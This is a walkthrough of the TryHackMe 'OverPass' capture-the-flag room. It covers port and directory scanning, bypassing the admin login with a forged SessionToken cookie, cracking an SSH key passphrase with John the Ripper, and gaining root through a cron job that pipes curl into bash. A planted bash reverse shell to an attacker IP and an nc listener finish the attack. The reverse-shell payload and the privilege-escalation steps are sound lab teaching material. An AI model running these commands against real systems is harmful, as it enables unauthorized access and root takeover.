CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


06/11/2024 Shad Hussain Knowledge Views 449 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - OverPass - THM

Room Link : https://tryhackme.com/room/overpass STEP1 nmap -p- -sSV 10.10.101.201 -Pn -A -T4 FINDING 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) ----------------------------------------------------------------------------------------------- STEP2 dirb http://10.10.101.201/ FINDING == DIRECTORY: http://10.10.101.201/aboutus/ + http://10.10.101.201/admin (CODE:301|SIZE:42) == DIRECTORY: http://10.10.101.201/css/ == DIRECTORY: http://10.10.101.201/downloads/ == DIRECTORY: http://10.10.101.201/img/ + http://10.10.101.201/index.html (CODE:301|SIZE:0) ---- Entering directory: http://10.10.101.201/aboutus/ ---- + http://10.10.101.201/aboutus/index.html (CODE:301|SIZE:0) ---- Entering directory: http://10.10.101.201/css/ ---- + http://10.10.101.201/css/index.html (CODE:301|SIZE:0) ---- Entering directory: http://10.10.101.201/downloads/ ---- + http://10.10.101.201/downloads/index.html (CODE:301|SIZE:0) + http://10.10.101.201/downloads/src (CODE:301|SIZE:0) ---- Entering directory: http://10.10.101.201/img/ ---- + http://10.10.101.201/img/index.html (CODE:301|SIZE:0) ----------------------------------------------------------------------------------------------- STEP3 http://10.10.101.201/admin moniter the source you will see a login.js file in the source open the login.js file and read it FINDING async function login() { const usernameBox = document.querySelector("#username"); const passwordBox = document.querySelector("#password"); const loginStatus = document.querySelector("#loginStatus"); loginStatus.textContent = "" const creds = { username: usernameBox.value, password: passwordBox.value } const response = await postData("/api/login", creds) const statusOrCookie = await response.text() if (statusOrCookie === "Incorrect credentials") { loginStatus.textContent = "Incorrect Credentials" passwordBox.value="" } else { Cookies.set("SessionToken",statusOrCookie) window.location = "/admin" } } if we set the Cookies.set("SessionToken",statusOrCookie) then we can login ----------------------------------------------------------------------------------------------- STEP4 install cookie editer https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/?utm_campaign=external-cookie-editor.com install it and add extention to the browser add the cookie Cookies.set("SessionToken",statusOrCookie) refresh the login page and you willbe loged in ----------------------------------------------------------------------------------------------- STEP5 copy the key in a file called "ovp.txt" and use ssh2john to convert it into hash for the user "James" cd /usr/share/john ./ssh2john.py /root/Desktop/ovp.txt /root/Desktop/ovpcrack john /root/Desktop/ovpcrack --wordlist=/usr/share/wordlists/rockyou.txt FINDING james13 ----------------------------------------------------------------------------------------------- STEP6 rename ovp.txt to ovp chmod 600 ovp ssh [email protected] -i ovp with password : james13 ----------------------------------------------------------------------------------------------- STEP7 ls -la cat user.txt FINDING thm{65c1aaf000506e56996822c6281e6bf7} ----------------------------------------------------------------------------------------------- STEP8 cat /etc/crontab FINDING * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash ----------------------------------------------------------------------------------------------- STEP9 nano /etc/hosts 10.17.65.196 overpass.thm ip will be attacker ip save it ctrl+x ctrl+y enter ----------------------------------------------------------------------------------------------- STEP10 on attacker machine create folder on desktop /download/src/buildscript.sh write in buildscript.sh #!/bin/bash bash -c "bash -i & /dev/tcp/10.6.63.158/4444 0&1" -- ip will be of attacker ip save it ----------------------------------------------------------------------------------------------- STEP11 start a python server on attacker desktop python3 -m http.server 80 open a nc listner on new terminal nc -nvlp 4444 wait for few mins you will get a revers shell on new terminal which will be root ----------------------------------------------------------------------------------------------- STEP12 on new terminal ls -la cat root.txt thm{7f336f8c359dbac18d54fdd64ea753bb} whoami root -----------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved